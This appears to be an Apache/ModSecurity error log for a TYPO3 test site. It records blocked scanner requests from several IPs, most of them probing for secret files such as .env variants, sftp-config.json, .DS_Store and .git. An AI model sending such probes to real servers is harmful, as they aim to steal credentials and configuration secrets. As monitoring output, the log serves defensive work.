[Sun Mar 09 19:17:28.305712 2025] [:error] [pid 1661010] [client 45.148.10.237:48532] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOKdqfb713GEcCO4g8AAAAAI"]
[Sun Mar 09 19:17:28.305880 2025] [:error] [pid 1661010] [client 45.148.10.237:48532] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOKdqfb713GEcCO4g8AAAAAI"]
[Sun Mar 09 19:17:28.433394 2025] [:error] [pid 1661024] [client 45.148.10.237:48578] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bOIj7A5zkImPzPl8TXwAAAAU"]
[Sun Mar 09 19:17:28.433631 2025] [:error] [pid 1661024] [client 45.148.10.237:48578] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bOIj7A5zkImPzPl8TXwAAAAU"]
[Sun Mar 09 19:17:28.433790 2025] [:error] [pid 1661024] [client 45.148.10.237:48578] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bOIj7A5zkImPzPl8TXwAAAAU"]
[Sun Mar 09 19:17:28.546252 2025] [:error] [pid 1661337] [client 45.148.10.237:48628] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOEDqCpAfbNQ_tz1tiQAAAAg"]
[Sun Mar 09 19:17:28.546512 2025] [:error] [pid 1661337] [client 45.148.10.237:48628] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOEDqCpAfbNQ_tz1tiQAAAAg"]
[Sun Mar 09 19:17:28.546675 2025] [:error] [pid 1661337] [client 45.148.10.237:48628] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOEDqCpAfbNQ_tz1tiQAAAAg"]
[Sun Mar 09 19:17:28.659295 2025] [:error] [pid 1661008] [client 45.148.10.237:48638] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z83bODV71pfFolEauGOlPwAAAAA"]
[Sun Mar 09 19:17:28.659881 2025] [:error] [pid 1661008] [client 45.148.10.237:48638] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z83bODV71pfFolEauGOlPwAAAAA"]
[Sun Mar 09 19:17:28.660322 2025] [:error] [pid 1661008] [client 45.148.10.237:48638] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z83bODV71pfFolEauGOlPwAAAAA"]
[Sun Mar 09 19:17:28.755936 2025] [:error] [pid 1661012] [client 45.148.10.237:48678] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOMc5LHaxeidRofnWfgAAAAQ"]
[Sun Mar 09 19:17:28.756255 2025] [:error] [pid 1661012] [client 45.148.10.237:48678] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOMc5LHaxeidRofnWfgAAAAQ"]
[Sun Mar 09 19:17:28.756476 2025] [:error] [pid 1661012] [client 45.148.10.237:48678] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOMc5LHaxeidRofnWfgAAAAQ"]
[Mon Mar 17 19:51:11.511087 2025] [:error] [pid 1841842] [client 13.41.54.2:49844] [client 13.41.54.2] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z9hvH0x77fSe_PrpAsNROwAAAAY"]
[Mon Mar 17 19:51:11.513730 2025] [:error] [pid 1841842] [client 13.41.54.2:49844] [client 13.41.54.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z9hvH0x77fSe_PrpAsNROwAAAAY"]
[Mon Mar 17 19:51:11.514183 2025] [:error] [pid 1841842] [client 13.41.54.2:49844] [client 13.41.54.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z9hvH0x77fSe_PrpAsNROwAAAAY"]
[Sun Mar 23 19:15:22.253494 2025] [authz_core:error] [pid 1979077] [client 142.93.129.190:34886] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sun Mar 23 19:15:24.611904 2025] [:error] [pid 1979107] [client 142.93.129.190:34924] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z-BPvKyb50xMLoJX0WhOCwAAAAU"]
[Sun Mar 23 19:15:24.612138 2025] [:error] [pid 1979107] [client 142.93.129.190:34924] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z-BPvKyb50xMLoJX0WhOCwAAAAU"]
[Sun Mar 23 19:15:24.612307 2025] [:error] [pid 1979107] [client 142.93.129.190:34924] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z-BPvKyb50xMLoJX0WhOCwAAAAU"]
[Sun Mar 23 19:15:25.278484 2025] [:error] [pid 1979074] [client 142.93.129.190:52010] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-BPvStmzbVTpOWEhO3uLgAAAAE"]
[Sun Mar 23 19:15:25.278774 2025] [:error] [pid 1979074] [client 142.93.129.190:52010] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-BPvStmzbVTpOWEhO3uLgAAAAE"]
[Sun Mar 23 19:15:25.279000 2025] [:error] [pid 1979074] [client 142.93.129.190:52010] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-BPvStmzbVTpOWEhO3uLgAAAAE"]
[Sun Mar 23 19:15:26.455646 2025] [authz_core:error] [pid 1979125] [client 142.93.129.190:52024] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Mar 24 17:31:27.450165 2025] [:error] [pid 1985843] [client 45.148.10.172:43356] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-GI3zx2KywIHC-QSHBRGAAAAA0"]
[Mon Mar 24 17:31:27.450622 2025] [:error] [pid 1985843] [client 45.148.10.172:43356] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-GI3zx2KywIHC-QSHBRGAAAAA0"]
[Mon Mar 24 17:31:27.450851 2025] [:error] [pid 1985843] [client 45.148.10.172:43356] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-GI3zx2KywIHC-QSHBRGAAAAA0"]
[Tue Mar 25 06:20:19.471641 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEQAAAAE"]
[Tue Mar 25 06:20:19.471921 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEQAAAAE"]
[Tue Mar 25 06:20:19.472089 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEQAAAAE"]
[Tue Mar 25 06:20:19.821302 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEgAAAAE"]
[Tue Mar 25 06:20:19.821569 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEgAAAAE"]
[Tue Mar 25 06:20:19.821752 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEgAAAAE"]
[Tue Mar 25 06:20:19.842612 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEwAAAAE"]
[Tue Mar 25 06:20:19.842861 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEwAAAAE"]
[Tue Mar 25 06:20:19.843033 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPEwAAAAE"]
[Tue Mar 25 06:20:19.863761 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPFAAAAAE"]
[Tue Mar 25 06:20:19.864005 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPFAAAAAE"]
[Tue Mar 25 06:20:19.864174 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPFAAAAAE"]
[Tue Mar 25 06:20:19.884952 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPFQAAAAE"]
[Tue Mar 25 06:20:19.885180 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPFQAAAAE"]
